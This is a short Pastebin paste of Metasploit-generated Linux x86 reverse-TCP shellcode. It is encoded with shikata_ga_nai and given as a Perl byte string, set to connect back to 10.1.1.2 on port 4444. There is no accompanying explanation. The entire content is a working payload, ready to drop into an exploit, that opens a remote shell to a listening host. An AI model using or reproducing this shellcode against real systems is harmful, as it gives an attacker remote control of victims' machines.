Advertisement
ak47suk1

Untitled

Aug 1st, 2010
252
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.82 KB | None | 0 0
  1. # linux/x86/shell_reverse_tcp - 108 bytes
  2. # http://www.metasploit.com
  3. # Encoder: x86/shikata_ga_nai
  4. # NOP gen: x86/single_byte
  5. # LHOST=10.1.1.2, LPORT=4444, ReverseConnectRetries=5,
  6. # PrependSetresuid=false, PrependSetreuid=false,
  7. # PrependSetuid=false, PrependChrootBreak=false,
  8. # AppendExit=false, InitialAutoRunScript=, AutoRunScript=
  9. my $buf =
  10. "\x53\x5b\x97\x9b\x91\x99\x56\x9f\x54\x53\xbe\x61\xfe\x26" .
  11. "\x3f\x29\xc9\xda\xd3\xb1\x12\xd9\x74\x24\xf4\x58\x31\x70" .
  12. "\x13\x03\x70\x13\x83\xe8\xfc\xe2\x94\xcf\xfd\xc8\xb5\x63" .
  13. "\x41\x64\x53\x86\xcc\x6b\x13\xe0\x03\xeb\x08\xb3\xf3\xe6" .
  14. "\xaf\x4a\x06\x91\xc7\x5d\x5a\x3b\x44\x34\x72\x92\x3a\x41" .
  15. "\x93\x57\xd0\x37\x0c\x95\xa4\xe1\x2b\xfc\x14\x2e\xf9\x7f" .
  16. "\x1d\x28\xf8\xd0\xf5\xe5\xd5\xa3\x6d\x92\x06\x26\x04\x0c" .
  17. "\xd0\x45\x86\x83\x6b\x68\x96\x2f\xa1\xeb";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement